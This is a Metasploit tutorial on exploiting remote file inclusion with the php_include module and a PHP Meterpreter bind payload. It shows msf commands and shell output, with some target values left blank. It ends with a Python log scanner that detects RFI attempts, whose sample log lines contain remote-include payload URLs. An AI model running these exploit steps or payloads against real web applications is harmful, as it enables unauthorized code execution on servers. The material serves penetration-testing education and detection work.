PHP Meterpreter

The Internet is littered with improperly coded web applications, and multiple vulnerabilities are disclosed on a daily basis. One of the more critical vulnerabilities is Remote File Inclusion (RFI), which allows an attacker to force the vulnerable site to execute PHP code of their choosing even though that code is stored on a different site. Recently, Metasploit published not only a php_include module but also a PHP Meterpreter payload. The php_include module is very versatile: it is not product-specific and can be used against any number of vulnerable webapps.

In order to make use of the file inclusion exploit module, you will need to know the exact path to the vulnerable site. Loading the module in Metasploit, we can see a great number of options available to us.

msf > use exploit/unix/webapp/php_include
msf exploit(php_include) > show options

Module options:

   Name      Current Setting                                                      Required  Description
   ----      ---------------                                                      --------  -----------
   PATH      /                                                                    yes       The base directory to prepend to the URL to try
   PHPRFIDB  /usr/share/metasploit-framework/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI                                                                         no        The URI to request, with the include parameter changed to XXpathXX
   Proxies                                                                        no        Use a proxy chain
   RHOST                                                                          yes       The target address
   RPORT     80                                                                   yes       The target port
   SRVHOST                                                                        yes       The local host to listen on.
   SRVPORT   8080                                                                 yes       The local port to listen on.
   URIPATH                                                                        no        The URI to use for this exploit (default is random)
   VHOST                                                                          no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

The most critical option to set in this particular module is the exact path to the vulnerable inclusion point. Where we would normally provide the URL to our PHP shell, we simply need to place the text “XXpathXX” and Metasploit will know to attack this particular point on the site.

msf exploit(php_include) > set PHPURI /rfi_me.php?path=XXpathXX
PHPURI => /rfi_me.php?path=XXpathXX
msf exploit(php_include) > set RHOST

In order to further show off the versatility of Metasploit, we will use the PHP Meterpreter payload.

msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL:
[*]  Local IP:
[*] PHP include server started.
[*] Sending stage (29382 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-08-21 14:35:51 -0600

meterpreter > sysinfo
Computer: V-XPSP2-SPLOIT-
OS      : Windows NT V-XPSP2-SPLOIT- 5.1 build 2600 (Windows XP Professional Service Pack 2) i586
meterpreter >

Just like that, a whole new avenue of attack is opened up using Metasploit.
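
On the defending side, the request sent to the inclusion point carries a remote URL in the parameter where XXpathXX was placed, and that is visible in the web server's access log. The following is an added example, not part of the original page or of Metasploit: a small log scanner that flags query parameters whose decoded value is a remote URL. The log lines are constructed samples using documentation address ranges, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request portion of a combined-format access log entry.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# URL wrappers PHP's include() will fetch from when allow_url_include is enabled.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp), bounded by max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(log_lines):
    """Return (client_ip, path, param, decoded_value, status) per suspicious parameter."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if REMOTE_RE.match(value):
                hits.append((m.group("ip"), url.path, name, value,
                             int(m.group("status"))))
    return hits

# Constructed sample lines (not captured traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Aug/2010:14:35:50 -0600] "GET /rfi_me.php?path=http://198.51.100.7:8080/x HTTP/1.1" 200 512',
    '192.0.2.10 - - [21/Aug/2010:14:35:52 -0600] "GET /rfi_me.php?path=%2568ttp%253A%252F%252F198.51.100.7%252Fx HTTP/1.1" 200 512',
    '192.0.2.44 - - [21/Aug/2010:14:36:01 -0600] "GET /rfi_me.php?path=footer.php HTTP/1.1" 200 2048',
    '192.0.2.44 - - [21/Aug/2010:14:36:05 -0600] "GET /search.php?q=what+is+http HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Only query-string parameters appear in an access log, so inclusion points fed from POST bodies or cookies need request-body logging to be covered by the same check.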